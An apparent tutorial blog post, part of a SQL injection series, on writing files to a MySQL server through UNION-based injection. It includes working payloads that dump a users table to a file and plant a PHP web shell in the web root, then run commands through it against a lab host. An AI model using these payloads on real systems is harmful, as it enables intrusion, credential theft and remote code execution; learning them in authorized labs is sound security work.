0xiN's Journey
SQLi Series - Database Enumeration Write File - 09

SQLi Series - Database Enumeration Write File - 09

0xiN's photo
0xiN
·

4 min read

Table of contents

Objective:

To provide a detailed, step-by-step guide on writing files to a back-end server through SQL injection vulnerabilities, enabling learners to fully understand and reproduce the techniques safely.

Introduction to File Writing in Modern DBMSes

a) Explanation of the restrictions on file writing in modern DBMSes

  • Default disabling of file-write functionality

  • Requirement of certain privileges for DBAs to write files

b) Importance of checking sufficient rights and DBMS file-writing allowance before attempting to write files

Prerequisites for Writing Files in MySQL

a) User with FILE privilege enabled

  • Explanation of the FILE privilege and its necessity for file writing

b) MySQL global secure_file_priv variable not enabled

  • Definition and purpose of the secure_file_priv variable

  • Impact of different values (empty, specific directory, NULL) on file reading/writing capabilities

c) Write access to the target location on the back-end server

  • Importance of having proper write permissions for the desired file location

Checking the secure_file_priv Variable

a) Using the SHOW VARIABLES statement in MySQL

  • Syntax: SHOW VARIABLES LIKE 'secure_file_priv';

  • Explanation of the query's purpose

b) Retrieving the value using a SELECT statement in a UNION injection

  • Location of global variables in the INFORMATION_SCHEMA database

  • Structure of the global_variables table (variable_name and variable_value columns)

  • Constructing the SQL query to retrieve the secure_file_priv value


SELECT variable_name, variable_value FROM information_schema.global_variables WHERE variable_name="secure_file_priv"

c) Adapting the query for a UNION injection payload

  • Adding junk columns to match the total number of columns in the original query

  • Example payload:


cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -

d) Interpreting the result and its impact on file reading/writing capabilities

Using SELECT INTO OUTFILE for File Writing

a) Explanation of the SELECT INTO OUTFILE statement

  • Purpose and common use cases (e.g., exporting data from tables)

  • Syntax: SELECT ... INTO OUTFILE '...'

b) Examples of writing table content to a file

  • Selecting all columns from a table and writing to a file

SELECT * FROM users INTO OUTFILE '/tmp/credentials';
  • Verifying the file content on the back-end server

c) Writing arbitrary data to a file using SELECT statements

  • Selecting a string value and writing it to a file

SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
  • Verifying the file content and ownership on the back-end server

d) Tip: Using the FROM_BASE64() function for advanced file exports, including binary data

Writing Files through SQL Injection

a) Attempting to write a text file to the web root directory

  • Constructing the query to write a test string to a file

SELECT 'file written successfully!' INTO OUTFILE '/var/www/html/proof.txt'
  • Adapting the query for a UNION injection payload

cn' UNION SELECT 1,'file written successfully!',3,4 INTO OUTFILE '/var/www/html/proof.txt'-- -

cn' union select 1,'test',3,4 into outfile '/tmp/test.txt'-- -
  • Verifying the file's existence in the web root directory

b) Finding the web root directory

  • Using LOAD_FILE to read server configuration files (Apache, Nginx, IIS)

  • Searching online for possible configuration locations

  • Running a fuzzing scan to test different potential web roots (Linux and Windows wordlists)

  • Utilizing server errors to identify the web directory

c) Writing a PHP web shell

  • Constructing a simple PHP web shell payload

<?php system($_REQUEST[0]); ?>
  • Adapting the UNION injection payload to write the web shell

cn' UNION SELECT "",'<?php system($_REQUEST[0]); ?>',"","" INTO OUTFILE '/var/www/html/shell.php'-- -
  • Verifying the web shell's existence and functionality by executing commands via the 0 parameter

http://SERVER_IP:PORT/shell.php?0=id
  • Confirming code execution and identifying the running user (e.g., www-data)
<http://94.237.63.83:49004/shell.php?0=cat+../flag.txt>

Best Practices and Safety Considerations

  • Always test in a controlled environment to avoid unintended consequences

  • Use the techniques responsibly and only on systems you have explicit permission to test

  • Properly secure and clean up any files written during testing

  • Stay updated on the latest security patches and best practices for preventing SQL injection vulnerabilities

Checkpoint Exercise

  • Set up a vulnerable MySQL-based web application in a safe testing environment

  • Attempt to write a text file to the web root using a UNION-based SQL injection payload

  • Verify the file's existence and content on the back-end server

  • Write a PHP web shell and confirm code execution by running a basic command

Conclusion

  • Recap of the key concepts and techniques covered in the guide

  • Emphasis on the importance of continuous learning and staying updated with the latest security practices

  • Encouragement to apply the acquired knowledge responsibly and ethically

Did you find this article valuable?

Support 0xiN's Journey by becoming a sponsor. Any amount is appreciated!